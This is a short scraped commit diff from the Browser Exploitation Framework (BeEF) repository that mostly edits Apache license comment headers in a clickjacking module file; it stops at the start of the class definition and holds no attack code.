# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:

16
modules/social_engineering/clickjacking/module.rb
View File

@@ -1,17 +1,9 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Clickjacking < BeEF::Core::Command
def self.options